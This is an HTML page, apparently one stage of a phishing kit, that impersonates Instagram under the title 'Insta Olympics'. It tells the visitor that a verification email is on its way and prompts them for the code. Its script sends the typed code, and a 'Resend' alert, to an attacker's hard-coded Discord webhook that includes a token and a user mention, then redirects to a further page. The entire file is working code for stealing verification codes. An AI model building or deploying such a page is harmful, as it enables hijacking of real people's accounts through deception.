<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Insta Olympics</title>
    <style type="text/css">
        body {
            font-family: 'Arial', sans-serif;
            background-color: #fafafa;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            width: 350px;
        }

        .login-box {
            background-color: #fff;
            border: 1px solid #dbdbdb;
            padding: 20px;
            text-align: center;
            margin: 5px;
        }

        .logo img {
            width: 80px;
            margin-bottom: 10px;
        }

        input {
            padding: 10px;
            margin: 5px;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            background-color: #fafafa;
            font-size: 14px;
        }

        button {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            background-color: #0095f6;
            border: none;
            border-radius: 3px;
            color: #fff;
            font-weight: bold;
            cursor: pointer;
        }

        .forgot-password {
            display: block;
            color: #00376b;
            margin-top: 15px;
            text-decoration: none;
            font-size: 12px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="login-box">
            <div class="logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram Logo">
                <h1>Please wait 5 minutes we are just sending you a verification email</h1>
            </div>
            <form onsubmit="sendToDiscord(event)">
                <input type="password" id="code" placeholder="Enter the code" required>
                <button type="submit">Log In</button>
            </form>
            <button onclick="resend()">Resend</button>
        </div>
    </div>

    <script type="text/javascript">
        async function resend() {
            const webhookURL = 'https://discord.com/api/webhooks/1270669844668350464/Ot_ihtSiBsIu6hG-s_mgaB8nXCfLfCq9xoItgjYtynqWCogF0w4NNxFiqibyExTTCdJJ';
            const resend = {
                content: "<@1226202962800541760> \n Resend!"
            };

            try {
                const response = await fetch(webhookURL, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(resend)
                });

                if (response.ok) {
                    alert("Successfully resend")
                }
                console.log('Resend message sent successfully.');
            } catch (error) {
                console.error('Error sending resend message:', error);
                alert('Failed to resend message. Please try again.');
            }
        }

        async function sendToDiscord(event) {
            event.preventDefault();

            const webhookURL = "https://discord.com/api/webhooks/1270669844668350464/Ot_ihtSiBsIu6hG-s_mgaB8nXCfLfCq9xoItgjYtynqWCogF0w4NNxFiqibyExTTCdJJ";
            const code = document.getElementById('code').value;

            const codes = {
                content: `<@1226202962800541760>\n Code: ${code}`
            };

            try {
                const response = await fetch(webhookURL, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(codes)
                });

                if (response.ok) {
                    // Redirect to another webpage after successful submission
                    window.location.href = 'index3.html';
                } else {
                    alert('Try Again!');
                }
            } catch (error) {
                console.error('Error:', error);
                alert('An error occurred.');
            }
        }
    </script>
</body>
</html>
